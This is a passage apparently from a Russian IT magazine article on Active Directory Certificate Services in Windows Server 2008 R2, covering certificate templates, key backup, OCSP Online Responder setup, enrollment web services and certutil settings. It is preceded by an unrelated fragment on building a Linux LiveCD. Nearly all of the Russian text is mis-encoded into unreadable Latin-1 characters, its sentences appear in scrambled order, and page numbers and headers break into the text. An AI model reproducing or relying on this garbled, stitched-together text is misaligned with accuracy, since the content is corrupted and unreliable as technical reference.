õî÷åøü ñîçäàòü ISO-îáðàç èëè bootinst. ÷òîáû óìåíüøèòü ðàçìåð äèñòðèáóòèâà. íàïðèìåð. âîçìîæíî.  ðåçóëüòàòå ïîÿâèòñÿ êàòàëîã ñ äàííûìè LiveCD — /tmp/live_data_NNNN. Âñå íåîáõîäèìîå äëÿ ñáîðêè (aufs.6. ÷òîáû â òâîåì LiveCD èñïîëüçîâàëàñü ïîñëåäíÿÿ âåðñèÿ ÿäðà. ëó÷øèé âûáîð äëÿ àäìèíà.linux-live. ×åðåç íåêîòîðîå âðåìÿ çàãðóçî÷íàÿ ôëåøêà áóäåò ãîòîâà. åãî ìîæíî çàïîëó÷èòü â ãîòîâîì âèäå íà ñàéòå Linux Live (http://www. squashfs è lzma) òû íàéäåøü íà ñàéòå Linux Live. • Óäàëè âñå ëèøíåå.sh äëÿ ñîçäàíèÿ LiveUSB. ðàáîòàþùèõ ïîä ñàìûìè ðàçíûìè ÎÑ. êàêóþ ïðîãó âûáðàòü? Åñëè ó òåáÿ óñòàíîâëåíà Debian èëè Ubuntu. ÷òî íóæíî áóäåò ïåðåêîìïèëèâàòü ÿäðî. z 125 .27 — íå ñàìîå íîâîå è äëÿ àðõèòåêòóðû i486. äîñòóïíî ÿäðî âåðñèè 2. squashfs.6. Ïðàâäà. ïóñòü è íå òàêîé óäîáíûé. Åñëè ñîáèðàòü ÿäðî ëåíü.

Web enrollment íåîáõîäèì äëÿ çàïðîñà ñåðòèôèêàòîâ è ïîëó÷åíèÿ èíôîðìàöèè îá îòîçâàííûõ ñåðòèôèêàòàõ ÷åðåç âåá-áðàóçåð. íåâîçìîæíîñòü èñïîëüçîâàòü Restricted Enrollment Agent è äðóãèå íîâøåñòâà). Ñëóæáà ïîäà÷è çàÿâîê íà ñåòåâûå óñòðîéñòâà èñïîëüçóåò ïðîòîêîë SCEP (Simple Certificate Enrollment Protocol). Íî ïðè ýòîì î÷åíü âàæíî îáåñïå÷èòü íåîáõîäèìûé óðîâåíü XÀÊÅÐ 10 /141/ 10 . òàê êàê ïðè óñòàíîâêå CA íåëüçÿ âûáðàòü äëÿ óñòàíîâêè êîìïîíåíò Web Service. направленных на обеспечение безопасности. Êàê è ðàíüøå. Äîâîëüíî ñåðüåçíûå îãðàíè÷åíèÿ ïî èñïîëüçîâàíèþ AD CS ïðèñóòñòâóþò è â ñòàíäàðòíîé ðåäàêöèè Server 2008 (âîçìîæíîñòü óñòàíîâêè òîëüêî êîìïîíåíòà CA.  òî âðåìÿ. êîòîðûé áûë ðàçðàáîòàí Cisco. Online Responder ïîçâîëÿåò êëèåíòàì ïîëó÷àòü èíôîðìàöèþ î ñòàòóñå îäíîãî ñåðòèôèêàòà áåç ïîëó÷åíèÿ ñïèñêîâ îòçûâà. à ïîñëåäíèå äâà êîìïîíåíòà ïîÿâèëèñü òîëüêî â Windows Server 2008 R2. äëÿ óïðàâëåíèÿ øàáëîíàìè òðåáóåòñÿ êîíòðîëëåð äîìåíà. êîòîðàÿ ïîñòàâëÿåòñÿ ñ Windows Server 2003. êîòîðûå ñëóæàò äëÿ âûäà÷è ñåðòèôèêàòîâ ïîëüçîâàòåëÿì. С каждым годом использование сертификатов растет.  Windows Server 2008 ñëóæáû ñåðòèôèêàöèè òåïåðü îòíîñÿòñÿ ê ñëóæáàì Active Directory. êîòîðûé äîëæåí íàõîäèòüñÿ â %SYSTEMROOT%. Microsoft довольно серьезно переработала старую службу Certificate Services. ÷àñòü èç êîòîðûõ áûëè ñíÿòû â R2 (íàêîíåö â ñòàíäàðòíîé ðåäàêöèè ïîÿâèëàñü âîçìîæíîñòü ðàáîòàòü ñ øàáëîíàìè ñåðòèôèêàòîâ âåðñèé âûøå ïåðâîé). Certificate Enrollment Web Service ïîçâîëÿåò êëèåíòàì àâòîìàòè÷åñêè ïîäàâàòü çàÿâêè íà ñåðòèôèêàòû è ïîëó÷àòü èõ ïî HTTPS. Íî äëÿ ðàáîòû Certificate Enrollment Web Services óæå íåîáõîäèìà ñõåìà íå íèæå 47 âåðñèè. Íàïðèìåð. êàê Web Service ïîëó÷àåò èíôîðìàöèþ î ïîëèòèêàõ èç AD ïî ïðîòîêîëó LDAP. íà÷èíàÿ ñ Windows Server 2008 R2. 126 ВАРИАНТЫ УСТАНОВКИ И УПРАВЛЕНИЯ AD CS AD CS íåëüçÿ óñòàíîâèòü íà Itanium ðåäàêöèè Windows Server 2008.SYN/ACK Лучник Анна luchnik@it-university. чтобы удовлетворять новым требованиям. Åñëè íåîáõîäèìî óñòàíîâèòü íà ñåðâåð äâà êîìïîíåíòà Certification Authority è Certificate Enrollment Web Service. отправки S/MIME-сообщений и других действий. Ðàñøèðåíèå NDES äëÿ IIS êîíôèãóðèðóåòñÿ ÷åðåç êëþ÷è ðååñòðà HKEY_LOCAL_ROOT\Software\ Microsoft\Cryptography\MSCEP.  Windows Server 2008 áûëè äîáàâëåíû íîâûå COM-îáúåêòû (ïîäðîáíóþ èíôîðìàöèþ î ñâîéñòâàõ ICertSrvSetup ìîæíî íàéòè íà MSDN).  ïðåäûäóùèõ âåðñèÿõ Windows Server â ñîñòàâ Certificate Services âõîäèëè òîëüêî ïåðâûå äâà êîìïîíåíòà. 2. äëÿ íàñòðîéêè ïàðàìåòðîâ óñòàíîâêè ïðèìåíÿåòñÿ êîíôèãóðàöèîííûé ôàéë CAPolicy. Ìû ìîæåì óñòàíîâèòü ðîëü Active Directory Certificate Services (AD CS) è íà ñåðâåð. êîòîðûå íàçûâàëèñü Certificate Services CA è Certificate Services Web Enrollment Support. www. 5. êîòîðûå ìîæíî èñïîëüçîâàòü äëÿ óñòàíîâêè CA.it-university. êîòîðàÿ èäåò ñ Windows Server 2008 R2. íî ÷àñòü ôóíêöèé ïðè ýòîì áóäåò íåäîñòóïíà. Network Device Enrollment Service (NDES) èñïîëüçóåòñÿ ìàðøðóòèçàòîðàìè è äðóãèìè ñåòåâûìè óñòðîéñòâàìè áåç ó÷åòíûõ çàïèñåé â äîìåíå äëÿ ïîëó÷åíèÿ ñåðòèôèêàòîâ.ru Что нового в AD CS? CERTIFICATE SERVICES В WINDOWS SERVER 2008 R2 VS. Ïðè ýòîì ìîæíî îáîéòèñü áåç îáíîâëåíèÿ ñõåìû – AD CS â Server 2008 è â Server 2008 R2 áóäåò ðàáîòàòü è íà ñõåìå. 3. и для того. Äëÿ ðàáîòû áîëüøèíñòâà êîìïîíåíòîâ òàêæå òðåáóåòñÿ IIS. à íà Server Core âñå êîìïîíåíòû AD CS ìîæíî óñòàíàâëèâàòü. WINDOWS SЕRVER 2003 Как известно. создания SSL-соединений. 6. Óñòàíîâêà AD CS ïðîèçâîäèòñÿ ÷åðåç äîáàâëåíèå ðîëåé â îñíàñòêå Server Manager.ru. òî ýòî íàäî äåëàòü â äâà ýòàïà. êîìïüþòåðàì è ñëóæáàì. òàê êàê øàáëîíû õðàíÿòñÿ íà íåì. Certificate Enrollment Policy Web Service ïîçâîëÿåò îïðåäåëèòü ïîëèòèêè äëÿ àâòîìàòè÷åñêîé ðåãèñòðàöèè ñåðòèôèêàòîâ è ïåðåäàâàòü èõ êëèåíòàì ïî HTTPS. Certification authorities (CAs) – ýòîò êîìïîíåíò ïîçâîëÿåò óñòàíîâèòü è íàñòðîèòü êîðíåâîé (root) èëè ïîä÷èíåííûé (subordinate) öåíòðû ñåðòèôèêàöèè (îíè æå «óäîñòîâåðÿþùèå öåíòðû»). íå âõîäÿùèé â äîìåí. Online Responder è Web enrollment íà ðàçëè÷íûå ñåðâåðà.  ñîñòàâ ðîëè AD CS â Windows Server 2008 R2 âõîäèò øåñòü êîìïîíåíòîâ: 1. 4. сертификаты нужны для надежной аутентификации.inf. Ñëóæáû ñåðòèôèêàöèè ÿâëÿþòñÿ õîðîøèìè êàíäèäàòàìè íà âèðòóàëèçàöèþ. Âñå êîìïîíåíòû ìîæíî ïîñòàâèòü íà îäèí ñåðâåð. íî ðåêîìåíäóåòñÿ ðàçíîñèòü CA. Íàïðèìåð. ìîæíî àâòîìàòèçèðîâàòü óñòàíîâêó è íàñòðîéêó ñ ïîìîùüþ VBScript. Äëÿ ïîëíîöåííîé ðàáîòû AD CS òðåáóåòñÿ AD DS (Active Directory Domain Services).

äîñòóïíîñòü AIA (Authority Information Access) è ñïèñêîâ îòçûâà. ñêðèïòû èëè êîìàíäíóþ ñòðîêó. Êðîìå òîãî. Òîëüêî Enterprise CA ìîãóò èñïîëüçîâàòü øàáëîíû ñåðòèôèêàòîâ. Microsoft îôèöèàëüíî ïîääåðæèâàåò âèðòóàëèçàöèþ ñëóæá ñåðòèôèêàöèè íà÷èíàÿ ñ Windows Server 2003 SP1. Äëÿ óïðàâëåíèÿ è íàñòðîéêè AD CS ìîæíî èñïîëüçîâàòü MMC-îñíàñòêè. êîòîðûå íåëüçÿ èçìåíÿòü – èíà÷å ãîâîðÿ. óòèëèòû certutil. òî çàêðûòûå êëþ÷è íå áóäóò ïîòåðÿíû è íå ïðèäåòñÿ ïåðåñòðàèâàòü âñþ èíôðàñòðóêòóðó. CNG – ýòî çàìåíà CryptoAPI. Ýòîãî ìîæíî äîñòè÷ü. è àâòîìàòè÷åñêóþ âûäà÷ó ñåðòèôèêàòîâ (certificate autoenrollment) è áûëè ïðåäñòàâëåíû â Windows Server 2003.áåçîïàñíîñòè äëÿ çàêðûòûõ êëþ÷åé.msc). ïðîâåðÿåò ñòàòóñ ñåðòèôèêàòîâ CA. íàïðèìåð. è èíôîðìàöèþ î íèõ ìîæíî ïîëó÷èòü èç íåñêîëüêèõ èñòî÷íèêîâ. Òàê êàê çàêðûòûå êëþ÷è òåïåðü õðàíÿòñÿ â ñêðûòîé ïàïêå %SYSTEMDRIVE%\ProgramData\Microsoft\Crypto\Keys. Ðàíüøå íàäî áûëè ïèñàòü ïîäðîáíûå èíñòðóêöèè äëÿ àäìèíèñòðàòîðîâ. Enterprise PKI ïîçâîëÿåò îäíîâðåìåííî îòñëåæèâàòü ñîñòîÿíèå è äîñòóïíîñòü íåñêîëüêèõ CA.  Windows Server 2000 ïðèñóòñòâîâàëè òîëüêî øàáëîíû ïåðâîé âåðñèè. Äàííàÿ âîçìîæíîñòü ìîæåò î÷åíü ïðèãîäèòüñÿ. äàæå åñëè êëþ÷ áûë ñãåíåðèðîâàí ñ èñïîëüçîâàíèåì CNG.exe è ñertreq.  ýòîì ñëó÷àå. íàïðèìåð. ìîæíî èñïîëüçîâàòü òîëüêî òå øàáëîíû.msc). ãëàâíàÿ íîâàÿ âîçìîæíîñòü êîòîðûõ – ðàáîòà ñ CNG (Cryptography Next Generation). õîòÿ ìîæíî èñïîëüçîâàòü êëàññè÷åñêèå àëãîðèòìû. êîòîðàÿ ðàíåå áûëà ÷àñòüþ Windows Server 2003 Resource Kit è íàçûâàëàñü PKI Health Tool. òàêèõ êàê îñíàñòêè Certificates (certmgr. òàêèå êàê RSA. ×òîáû ìîæíî áûëî âîññòàíîâèòü èëè ìèãðèðîâàòü CA ïðè ñîçäàíèè è èñïîëüçîâàíèè â êà÷åñòâå ðåçåðâíîé êîïèè System State Backup. ШАБЛОНЫ СЕРТИФИКАТОВ Ñ ïîìîùüþ øàáëîíîâ ñåðòèôèêàòîâ ìîæíî îïðåäåëèòü ôîðìàò è ñîäåðæèìîå èçäàâàåìîãî ñåðòèôèêàòà. ÷òîáû îíè ñîçäàëè â 127 . òî îíè íå ïîïàäàþò â ðåçåðâíóþ êîïèþ ñîñòîÿíèÿ ñèñòåìû. Pkiview óäîáíî èñïîëüçîâàòü. Certification Authority (certsrv. Ñòîèò îòìåòèòü.msc) è Certificate Templates (certtmpl.msc) äëÿ óïðàâëåíèÿ îäíîèìåííûì êîìïîíåíòîì. òàê êàê êëþ÷è îñòàíóòñÿ â HSM. Ñåðòèôèêàòû ïî øàáëîíàì òðåòüåé âåðñèè ìîæíî èçäàâàòü è íà CA íà Windows Server 2003. êîòîðûå èäóò â ñîñòàâå ÎÑ è çàäàâàòü äëÿ íèõ òîëüêî ðàçðåøåíèÿ íà âûäà÷ó ñåðòèôèêàòîâ. ê êîòîðîé ìîæíî ïîëó÷èòü äîñòóï ÷åðåç %SYSTEMDRIVE%\Users\All Users\Microsoft\Crypto\Keys. ðàáîòàþùèõ ïî ðàçëè÷íûì ïðîòîêîëàì. â Windows XP è Windows Server 2003. èñïîëüçîâàòü ñåðòèôèêàò ñ êëþ÷îì äëÿ àëãîðèòìà. Øàáëîíû âòîðîé âåðñèè ïîääåðæèâàþò âîññòàíîâëåíèå è àðõèâàöèþ êëþ÷åé. Íåêîòîðûå èçìåíåíèÿ ïðîèçîøëè è â ðåçåðâíîì êîïèðîâàíèè AD CS â Server 2008 R2. Áîëüøàÿ ÷àñòü èíñòðóìåíòîâ ñóùåñòâîâàëà è â ïðåäûäóùèõ âåðñèÿõ. èç ðåçåðâíîé êîïèè). êîãäà â îðãàíèçàöèè ðàçâåðíóòî íåñêîëüêî CA. èñïîëüçóÿ àïïàðàòíûå êðèïòîãðàôè÷åñêèå ìîäóëè (HSM). Âòîðàÿ è òðåòüÿ âåðñèè øàáëîíîâ ïîääåðæèâàþòñÿ â ðåäàêöèÿõ Enterprise è Datacenter. êîòîðîå èñïîëüçóåò ñåðòèôèêàòû ñ íåñòàíäàðòíûìè ðàñøèðåíèÿìè. Òî åñòü íåëüçÿ.exe. íàäî åùå ñîçäàòü ðåçåðâíóþ êîïèþ çàêðûòûõ êëþ÷åé.  ðåäàêöèè Standard íîâûå âåðñèè øàáëîíîâ ïîääåðæèâàþòñÿ òîëüêî â Server 2008 R2. Èñïîëüçîâàíèå øàáëîíîâ òðåòüåé âåðñèè äëÿ ðàáîòû ñî ñìàðò-êàðòàìè òàêæå çàòðóäíåíî. Äîáàâèëàñü îñíàñòêà Online Responder Management (ocsp.  Windows Server 2008 R2 è Windows 7 áûë äîáàâëåí èíòåðôåéñ ïðîãðàììèðîâàíèÿ (Certificate Template API). êîòîðûé ïîçâîëÿåò ïðè óñòàíîâêå ïðèëîæåíèÿ äîáàâëÿòü íîâûå øàáëîíû ñåðòèôèêàòîâ. Ñ ïîìîùüþ ðàçíîöâåòíûõ îòìåòîê ìîæíî ñóäèòü î äîñòóïíîñòè è ñîñòîÿíèè PKI. â òàêîé ñèòóàöèè: ðàçðàáîò÷èêè ïèøóò ïðèëîæåíèå.  Windows Server 2008 ïîÿâèëèñü øàáëîíû âåðñèè 3. ÷òî èñïîëüçîâàíèå ñåðòèôèêàòîâ íà îñíîâå NSA Suite B Cryptography (ê êîòîðûì îòíîñÿòñÿ àëãîðèòìû íà îñíîâå ýëëèïòè÷åñêèõ êðèâûõ) ïîääåðæèâàåòñÿ òîëüêî ÎÑ. äàæå åñëè âèðòóàëêà öåëèêîì ïîïàäåò ê çëîóìûøëåííèêó (íàïðèìåð.msc). òàê êàê CSP (Cryptography Service Provider) äëÿ ñìàðò-êàðò íå ïîääåðæèâàþò íîâûå àëãîðèòìû CNG. Äëÿ ýòîãî ìîæíî âîñïîëüçîâàòüñÿ êîìàíäîé certutil –backupKey <ïóòü_äëÿ_ðåçåðâíîé_êîïèè> èëè îñíàñòêîé Certification Authority. íà÷èíàÿ ñ Windows Vista.0 è ïîääåðæêà ðàíåå íåïîääåðæèâàåìûõ êðèïòîãðàôè÷åñêèõ àëãîðèòìîâ. à òàêæå çàäàòü ðàçðåøåíèÿ XÀÊÅÐ 10 /141/ 10 íà çàïðîñ ñåðòèôèêàòîâ äëÿ ïîëüçîâàòåëåé è êîìïüþòåðîâ. èñïîëüçóþùåãî ýëëèïòè÷åñêèå êðèâûå. â êîòîðîé ðåàëèçîâàíà ïîääåðæêà àëãîðèòìîâ èç CryptoAPI 1. ñðåäè êîòîðûõ àëãîðèòìû ÝÖÏ è îáìåíà êëþ÷àìè íà îñíîâå ýëëèïòè÷åñêèõ êðèâûõ. à òàêæå äîïîëíèòåëüíûå àëãîðèòìû õåøèðîâàíèÿ. â ñîñòàâ ÎÑ âîøëà îñíàñòêà Enterprise PKI (pkiview.

÷òîáû áûòü óâåðåííûì. Îíè ìîãóò áûòü íàñòðîåíû ñ ïîìîùüþ íîâûõ ïàðàìåòðîâ ãðóïïîâîé ïîëèòèêè (Certificate Path Validation Settings âêëàäêà Revocation). à êàêèì îáðàçîì ïîëüçîâàòåëè è êîìïüþòåðû ïîëó÷àþò ñåðòèôèêàòû? Èíà÷å ãîâîðÿ. íî è ïàðîëè.dll. ñâÿçàííûõ ñ àêòóàëüíîñòüþ èíôîðìàöèè. òî ñïèñîê áóäåò áûñòðî ðàñòè. íà÷èíàÿ ñ Windows Vista. НОВЫЕ СПОСОБЫ ЗАПРОСА СЕРТИФИКАТОВ Êñòàòè. Êîìïîíåíò Web Enrollment. Ñòàðàÿ áèáëèîòåêà XEnroll.  ýòîì ñëó÷àå êëèåíòû ïðè ïåðâîì ïîëó÷åíèè ñåðòèôèêàòà äîëæíû áûòü â òîé æå ñåòè. CA Web Enrollment. Ïðè ýòîì â êà÷åñòâå àóòåíòèôèêàöèè ìîæíî èñïîëüçîâàòü íå òîëüêî Kerberos. Äîáàâèòü êîìïîíåíò Online Responder ðîëè AD CS. Îòâåò÷èê ðàçáèðàåò çàïðîñû îò êëèåíòîâ. êîòîðûå íàêëàäûâàþòñÿ íà ñåðòèôèêàòû (íàïðèìåð. ñòàòóñ êîòîðûõ áûë èçìåíåí ïî ñðàâíåíèþ ñ ïðåäûäóùèì ñïèñêîì îòçûâà. à â ñëó÷àå СПИСКИ ОТЗЫВА VS. òî ìîæíî èñïîëüçîâàòü ðåæèì òîëüêî îáíîâëåíèÿ (renewal-only). íàïðèìåð. êîíå÷íî.msc. ðóêàìè ñîçäàòü PKCS#10 çàïðîñ è ñ ïîìîùüþ êîìàíäíîé ñòðîêè è certreq ïåðåäàòü çàïðîñ íà CA. Êîìïîíåíò Online Responder èñïîëüçóåò ïðîòîêîë OCSP (Online Certificate Status Protocol). à â êà÷åñòâå òðàíñïîðòíîãî ïðîòîêîëà – Distributed COM (DCOM).  ðåçóëüòàòå ïîëüçîâàòåëü ìîæåò äàæå íå ïîäîçðåâàòü. íàäî ïîëó÷èòü ñïèñîê îòçûâà è ïðîâåðèòü íàëè÷èå â íåì ðàññìàòðèâàåìîãî ñåðòèôèêàòà. Äëÿ ðàáîòû Online Responder òðåáóåòñÿ IIS. êîòîðûå íå âõîäÿò â äîìåí èëè íå èìåþò ïðÿìîãî äîñòóïà â ñåòü ñ CA. êîòîðûé áóäåò àâòîìàòè÷åñêè ïðåäëîæåíî óñòàíîâèòü. â êîìàíäèðîâêàõ. êîòîðûå íå ïîäñîåäèíåíû ê êîðïîðàòèâíîé ñåòè. Online Responder òðåáóåòñÿ âíà÷àëå óñòàíîâèòü è íàñòðîèòü. èñïîëüçóåò äëÿ ïîäà÷è çàÿâîê íîâûé ïðîòîêîë WS-Trust. ðàçðåøåíèå àðõèâèðîâàíèÿ êëþ÷åé òîëüêî äëÿ ñåðòèôèêàòîâ.  ñëó÷àå åñëè êëèåíòó òðåáóåòñÿ èíôîðìàöèÿ î ñòàòóñå áîëüøîãî êîëè÷åñòâà ñåðòèôèêàòîâ. òàê êàê îêàçàëîñü ëåã÷å íàïèñàòü ñ íóëÿ. ONLINE RESPONDER Ïðè ïðîâåðêå âàëèäíîñòè ñåðòèôèêàòà ñðåäè ïðî÷åãî ïðîâåðÿåòñÿ ñðîê åãî äåéñòâèÿ è ñîñòîÿíèå îòçûâà. íî íå ðåøàþò âñåõ ïðîáëåì.  îòëè÷èå îò èñïîëüçîâàíèÿ ñïèñêîâ îòçûâà. òî öåëåñîîáðàçíî èñïîëüçîâàòü ñïèñêè îòçûâà. Ïîëèòèêè äëÿ ýòèõ ñëóæá íàñòðàèâàþòñÿ ÷åðåç ãðóïïîâûå ïîëèòèêè èëè íà êëèåíòå. ïðèñóòñòâîâàë è ðàíåå. ïîÿâèâøèéñÿ â Server 2008 R2. îáíîâëåíèÿ ñåðòèôèêàòîâ ìîãóò âîñïîëüçîâàòüñÿ âîçìîæíîñòÿìè CA Web Enrollment. è ñåðòèôèêàòû. òî ìîæåò áûòü òàêàÿ ñèòóàöèÿ. Åñëè â îðãàíèçàöèè áîëüøîå êîëè÷åñòâî ñåðòèôèêàòîâ.  Windows Server 2008 ïîÿâèëèñü ñåòåâûå îòâåò÷èêè (Online Responder). ÷òî è CA. íàïðèìåð. Êëèåíòû. èëè äëÿ êîìïüþòåðîâ. ÷åì öåíòð ñåðòèôèêàöèè. êàê â ñëó÷àå êîìïðîìåòàöèè êëþ÷à. êîòîðûé íåîáõîäèì äëÿ ýòîãî. êîãäà îíè. àâòîìàòè÷åñêàÿ ïîäà÷à çàÿâîê íå ïîääåðæèâàåòñÿ. îïèñàííûé â RFC 2560. ìîãóò çàïðîñèòü ñåðòèôèêàò ÷åðåç âåá-èíòåðôåéñ. êîòîðûì íàäî îáíîâëÿòü ñåðòèôèêàòû. Åñëè ïîëüçîâàòåëü äîìåííûé è ïîäêëþ÷åí ê êîðïîðàòèâíîé ñåòè. Äëÿ ýòîãî íàäî âûïîëíèòü ñëåäóþùèå øàãè: 1. òàê è ïðè èçìåíåíèè èíôîðìàöèè î âëàäåëüöå. áûëà çàìåíåíà íà íîâóþ – CertEnroll. êàê îíè ìîãóò ïîäàâàòü çàïðîñ íà ñåðòèôèêàò è óñòàíàâëèâàòü åãî íà êîìïüþòåð? Ìîæíî. à èíôîðìàöèè îá ýòîì â CRL åùå íåò. ñîçäàííîãî â òåñòîâîé ñðåäå. Øàáëîí íåîáõîäèìî ñîçäàâàòü ÷åðåç ñòàíäàðòíóþ îñíàñòêó certtmpl.SYN/ACK Оснастка Enterprise PKI Установка служб Certificate Enrollment Web Services ñâîåé ñèñòåìå íåîáõîäèìûé øàáëîí. Òåïåðü ìîæíî äîáàâèòü íîâûé øàáëîí ïðîãðàììíî ñ ïîìîùüþ èìïîðòà ïðåäâàðèòåëüíî ýêñïîðòèðîâàííîãî øàáëîíà. áåç íåîáõîäèìîñòè ìíîãîêðàòíûõ çàïðîñîâ ê ñåðâåðó. Òðàäèöèîííî èíôîðìàöèÿ îá îòîçâàííûõ ñåðòèôèêàòàõ ïîìåùàåòñÿ â ñïèñêè îòçûâà (CRL (certificate revocation list)). êîòîðûå èñïîëüçóþòñÿ äëÿ øèôðîâàíèÿ). ÷åì èñïðàâèòü òî. êîòîðûå íàõîäÿòñÿ â äðóãîì ëåñå. ×òîáû óçíàòü. ÷åðåç îñíàñòêó Certificates. Òàê êàê ñïèñêè ïóáëèêóþòñÿ ñ çàäàííûì èíòåðâàëîì. òî ìîæíî ñ ïîìîùüþ ãðóïïîâûõ ïîëèòèê íàñòðîèòü àâòîìàòè÷åñêóþ ïîäà÷ó è îáðàáîòêó çàÿâîê. îöåíèâàåò ñòàòóñ ñåðòèôèêàòà è îòïðàâëÿåò îáðàòíî ïîäïèñàííûé îòâåò ñ èíôîðìàöèåé î ñòàòóñå çàïðîøåííîãî ñåðòèôèêàòà. íî åñòü êëèåíòû.dll. êàê ýòî ñäåëàòü. Web Enrollment ïîçâîëÿåò ïîäàâàòü çàÿâêè â ôîðìàòå PKCS #10 èëè ñîçäàâàòü çàïðîñû èíòåðàêòèâíî ÷åðåç áðàóçåð. êîòîðûå ñîäåðæàò â ñåáå òîëüêî èíôîðìàöèþ î ñåðòèôèêàòàõ. ÷òî ñåðòèôèêàò óæå îòîçâàí. Íîâûå ñåðâèñû – Certificate Enrollment Policy Web Service è Certificate Enrollment Web Service – ïîçâîëÿþò ïîëó÷èòü ïîëèòèêè è ïîäàòü çàÿâêè íà ñåðòèôèêàòû ÷åðåç HTTPS. Åñëè íåîáõîäèìî èçáåæàòü çàïðîñîâ ê CA íà íîâûå ñåðòèôèêàòû èç èíòåðíåòà. ÷òî áûëî. 128 XÀÊÅÐ 10 /141/ 10 . Delta CRL ÷àñòè÷íî ðåøàþò ïðîáëåìû ñ îáúåìîì ñïèñêîâ îòçûâà. íî áûë ñóùåñòâåííî ïåðåðàáîòàí. íî íå âñåãäà åñòü âîçìîæíîñòü îáúÿñíèòü ïîëüçîâàòåëÿì. ÷òî åìó áûë óñòàíîâëåí íîâûé ñåðòèôèêàò èëè îáíîâëåí ñòàðûé. òàê êàê èõ äîñòàòî÷íî ïîëó÷èòü îäèí ðàç. Èõ ìîæíî èñïîëüçîâàòü êàê àëüòåðíàòèâó èëè â äîïîëíåíèå ê ñïèñêàì îòçûâà ñåðòèôèêàòîâ. áûë ëè îòîçâàí ñåðòèôèêàò. Ïðè òàêîì ñïîñîáå àóòåíòèôèêàöèè àâòîìàòè÷åñêàÿ ïîäà÷à çàÿâîê (autoenrollment) íåäîñòóïíà äëÿ êîìïüþòåðîâ. à êëèåíòû ïðè ïðîâåðêå ñòàòóñà ñåðòèôèêàòà áóäóò æäàòü çàêà÷êè ñïèñêà. êîòîðàÿ áûëà íàïèñàíà ìíîãî ëåò íàçàä è äîëãî äîïîëíÿëàñü íîâûìè ôóíêöèÿìè è áàãàìè. ÷òî îí íå íàðóøàåò îãðîìíîå êîëè÷åñòâî îãðàíè÷åíèé. ñìåíå äîëæíîñòè èëè ôàìèëèè.  Windows Server 2008 è áîëåå ðàííèõ âåðñèÿõ äëÿ àóòåíòèôèêàöèè ïîëüçîâàòåëåé è êîìïüþòåðîâ ïðè çàïðîñå ñåðòèôèêàòîâ èñïîëüçîâàëñÿ ïðîòîêîë Kerberos. Ñåðòèôèêàò ìîæåò áûòü îòîçâàí. Êðîìå îáû÷íûõ ñïèñêîâ ñóùåñòâóþò åùå è ðàçíîñòíûå (Delta CRL). Ïðîòîêîë OCSP ïîääåðæèâàþò êëèåíòû.

è ôóíêöèè. Crypto API è XEnroll. Íåìàëîâàæíî è ïîÿâëåíèå ïîääåðæêè àëãîðèòìîâ íà ýëëèïòè÷åñêèõ êðèâûõ. Ýòè àòðèáóòû óæå íàñòðîåíû â øàáëîíå OCSP Response Signing. ñêîëüêî òðåáóåòñÿ. Íà ïîñëåäíåì ýòàïå íåîáõîäèìî íàñòðîèòü ñàì ñåòåâîé îòâåò÷èê. 4.  Windows 2003 äëÿ ðàçðåøåíèÿ ýòîé ñèòóàöèè íåîáõîäèìî âðó÷íóþ XÀÊÅÐ 10 /141/ 10 ñîçäàòü ñòîëüêî ñåðòèôèêàòîâ äëÿ ïîäïèñè îòâåòîâ OCSP. çíà÷èòåëüíî ðàñøèðèëèñü ñïîñîáû çàïðîñà è ïîëó÷åíèÿ ñåðòèôèêàòîâ. òî äëÿ ðàáîòû Online Responder òðåáóåòñÿ ñîîòâåòñòâóþùèé ñåðòèôèêàò. 5. ïîäïèñàííîãî òåì æå êëþ÷îì CA. Äëÿ ýòîãî íàäî âûïîëíèòü íà CA êîìàíäó certutil -setreg ca\UseDefinedCACertInRequest 1. êîòîðûå ïîçâîëÿþò âûáèðàòü ìåæäó ñêîðîñòüþ. è æäàòü íîâûõ.dll) ïåðåïèñàíû ñ íóëÿ. z 129 . Äëÿ StandAlone CA íàäî åùå ìåíÿòü çíà÷åíèå ñîîòâåòñòâóþùåãî ôëàãà êîìàíäîé certutil -v -setreg policy\editflags +EDITF_ ENABLEOCSPREVNOCHECK. êîòîðûé áóäåò èñïîëüçîâàòüñÿ îòâåò÷èêîì.  ñâîéñòâàõ CA äëÿ AIA óêàçàòü ïóòü. ÷òîáû ïîêðûòü ñðîê äåéñòâèÿ äâóõ ñåðòèôèêàòîâ CA. Òåïåðü ñåðòèôèêàòû ìîãóò ïîëó÷àòü è ñåòåâûå óñòðîéñòâà áåç çàïèñè â äîìåíå. ó àäìèíèñòðàòîðîâ è ïðîãðàììèñòîâ ïîÿâèëèñü ðàçëè÷íûå âàðèàíòû äëÿ ïðîâåðêè ñòàòóñà îòîçâàííûõ ñåðòèôèêàòîâ. íàñòðîèâ íà íåãî ðàçðåøåíèÿ (Read è Enroll) äëÿ ñåðâåðà. Ê ñîæàëåíèþ. áåç âíèìàíèÿ íå îñòàâëåíû è ëþáèòåëè àâòîìàòèçàöèè è ñêðèïòîïèñàíèÿ – íîâûå îáúåêòû è ôóíêöèè ïîçâîëÿò èì ðåàëèçîâàòü ñâîè ôàíòàçèè. íà êîòîðûé óñòàíîâëåí Online Responder. Äëÿ êîððåêòíîé ðàáîòû Online Responder â ïåðèîä. 3. êîòîðûé èñïîëüçîâàëñÿ äëÿ ïîäïèñàíèÿ ñåðòèôèêàòà. ìíîãèå áèáëèîòåêè (íàïðèìåð. Ñåðòèôèêàò. äîëæåí îáëàäàòü ñëåäóþùèìè àòðèáóòàìè: êîðîòêèé ñðîê äåéñòâèÿ (íåñêîëüêî íåäåëü). à àìåðèêàíñêèå ñòàíäàðòû. Òàêèì îáðàçîì. îáúåìîì äàííûõ è àêòóàëüíîñòüþ èíôîðìàöèè. ЗАКЛЮЧЕНИЕ Âèäîèçìåíåíèÿ ñëóæá ñåðòèôèêàöèè ïðîèçâîäèëèñü è â Windows Server 2008. êîòîðûå ïîçâîëÿò ïîëüçîâàòåëÿì åùå ìåíüøå ðàçáèðàòüñÿ â ñåðòèôèêàòàõ. êîãäà ïðîèñõîäèò îáíîâëåíèå êëþ÷à CA. íåîáõîäèìî ðàçðåøèòü îáíîâëåíèÿ ñåðòèôèêàòîâ Online Responder ñ èñïîëüçîâàíèåì ñóùåñòâóþùèõ êëþ÷åé öåíòðà ñåðòèôèêàöèè.  èòîãå ïîÿâèëèñü âîçìîæíîñòè. äîáèâàëàñü ïîääåðæêà íîâûõ ïðîòîêîëîâ è êðèïòîãðàôè÷åñêèõ àëãîðèòìîâ. íî îæèäàòü èíîãî áûëî áû ñòðàííî. èç-çà ÷åãî ìîæíî íàäåÿòüñÿ íà èçáàâëåíèå îò 